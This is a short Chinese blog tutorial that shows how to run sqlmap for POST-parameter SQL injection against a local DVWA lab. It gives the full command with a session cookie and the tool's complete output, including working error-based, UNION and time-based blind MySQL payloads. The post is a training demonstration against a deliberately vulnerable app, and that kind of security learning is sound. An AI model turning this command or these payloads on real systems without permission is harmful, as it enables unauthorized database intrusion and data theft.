Sqlmap的POST注入

最简单的是get注入。。。  很多人刚用sqlmap不知道如何进行post注入,所以这里简单演示下。


F:\Pentest\software\测试软件\sqlmap>python sqlmap.py -u "http://192.168.1.204/dvwa/vulnerabilities/sqli/index.php?Submit=Submit#" --data "id=1" --cookie "security=low; PHPSESSID=2ct43q8u003g4fjm1o6jrjmbc7"
'svn' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

    sqlmap/1.0-dev (r4826) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:48:51

'stty' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
[14:48:52] [INFO] using 'F:\Pentest\software\测试软件\sqlmap\output\192.168.1.204\session' as session file
[14:48:52] [INFO] testing connection to the target url
[14:48:52] [INFO] testing if the url is stable, wait a few seconds
[14:48:53] [INFO] url is stable
[14:48:53] [INFO] testing if POST parameter 'id' is dynamic
[14:48:53] [WARNING] POST parameter 'id' appears to be not dynamic
[14:48:53] [INFO] heuristics detected web page charset 'ascii'
[14:48:53] [INFO] heuristic test shows that POST parameter 'id' might be injectable (possible DBMS: MySQL)
[14:48:53] [INFO] testing sql injection on POST parameter 'id'
[14:48:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:48:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:48:54] [INFO] POST parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[14:48:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:48:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:49:05] [INFO] POST parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[14:49:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:49:05] [INFO] target url appears to be UNION injectable with 2 columns
[14:49:05] [INFO] POST parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
---
Place: POST
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 2782 FROM(SELECT COUNT(*),CONCAT(0x3a7a727a3a,(SELECT (CASE WHEN (2782=2782) THEN 1 ELSE 0 END)),0x3a7877753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KQLu'='KQLu

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(0x3a7a727a3a,0x4f584c50796c6c55696e,0x3a7877753a)# AND 'nemX'='nemX

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'tLql'='tLql
---

[14:49:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[14:49:09] [INFO] Fetched data logged to text files under 'F:\Pentest\software\测试软件\sqlmap\output\192.168.1.204'

[*] shutting down at 14:49:09


评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值